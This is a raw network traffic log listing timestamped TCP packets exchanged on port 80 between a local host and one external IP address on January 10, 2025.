Jan 10, 2025 19:12:29.363898993 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.363898993 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.363909960 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.363922119 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.363934994 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.363960981 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.363960981 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364018917 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364020109 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364032030 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364042044 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364053011 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364064932 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364085913 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364085913 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364094973 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364104033 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364106894 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364151001 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364187002 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364197969 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364239931 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364244938 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364257097 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364268064 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364279985 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364284039 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364284039 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364290953 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364320993 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364320993 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364321947 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364331961 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364346981 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364424944 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364463091 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364473104 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364484072 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364495039 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364506006 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364518881 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364528894 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364542007 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364563942 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364581108 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364592075 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364602089 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364603996 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364615917 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364645004 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364645004 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364696980 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364703894 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364713907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364723921 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364737034 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364747047 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364752054 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364758968 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364772081 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364788055 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364810944 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364821911 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364831924 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364835024 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364845991 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364859104 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364871025 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364871025 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364885092 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364913940 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.364959955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364970922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364983082 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.364994049 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.365005970 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.365011930 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.365044117 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.450903893 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.450942993 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.450953960 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.450969934 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451010942 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451010942 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451045990 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451059103 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451066971 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451097965 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451123953 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451131105 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451143026 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451154947 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451168060 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451181889 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451183081 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451212883 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451221943 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451225042 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451237917 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451247931 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451251030 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451281071 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451286077 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451297045 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451298952 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451311111 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451334953 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451344967 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451347113 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451361895 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451394081 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451401949 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451415062 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451426983 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451438904 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451458931 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451458931 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451483011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451566935 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451579094 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451591015 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451617956 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451659918 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451669931 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451682091 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451692104 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451704979 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451726913 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451726913 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451752901 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451776981 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451788902 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451800108 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451812983 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451823950 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451844931 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451870918 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451910019 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451924086 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451936960 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451947927 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451965094 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.451966047 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.451991081 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452009916 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452012062 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452022076 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452033043 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452073097 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452073097 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452099085 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452111006 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452121973 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452135086 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452147007 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452161074 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452187061 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452187061 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452192068 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452204943 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452219009 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452225924 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452246904 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452260971 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452274084 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452286959 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452297926 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452327013 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452327013 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452420950 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452433109 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452445984 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452460051 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452471018 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452471018 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452471972 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452487946 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452500105 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452511072 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452526093 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452543020 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452545881 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452553988 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452565908 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452635050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452671051 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452682972 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452693939 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452706099 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452718019 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452719927 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452719927 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452729940 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452759981 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452759981 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452804089 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452825069 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452836990 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452850103 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452862978 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452874899 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452874899 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452874899 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452887058 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452893019 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452898979 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452945948 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452945948 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.452966928 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452979088 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.452991009 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453012943 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453039885 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453039885 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453043938 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453056097 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453068018 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453071117 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453089952 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453114986 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453138113 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453141928 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453154087 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453165054 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453176975 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453188896 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453217983 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453217983 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453277111 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453299999 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453311920 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453322887 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453335047 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453346968 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453361034 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453367949 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453373909 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453386068 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453397036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453401089 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453401089 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453437090 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453454971 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453466892 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453478098 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453490019 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453490019 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453515053 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453515053 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453520060 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453532934 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453545094 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453556061 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453567028 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453572035 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453572035 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453619003 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453619003 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453653097 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453666925 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453677893 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453690052 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453701019 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453711987 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453723907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.453730106 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453730106 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453746080 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.453779936 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.539576054 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539602995 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539617062 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539630890 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539664030 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539675951 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539674997 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.539688110 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539700985 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.539710045 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539722919 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539733887 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539746046 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.539746046 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.539747000 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539814949 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.539928913 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539941072 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539952040 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539973021 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539980888 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.539985895 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.539998055 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540011883 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540020943 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540020943 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540024042 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540035963 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540050983 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540065050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540065050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540066957 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540077925 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540112972 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540116072 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540116072 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540148020 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540153027 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540163994 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540195942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540208101 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540219069 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540232897 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540232897 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540246964 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540281057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540298939 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540312052 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540313959 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540313959 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540323973 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540347099 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540347099 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540354967 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540364027 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540366888 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540380955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540391922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540419102 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540419102 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540437937 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540441036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540452957 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540463924 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540474892 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540488005 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540493011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540493011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540528059 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540532112 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540544987 CET	80	49726	104.21.75.48	192.168.2.11
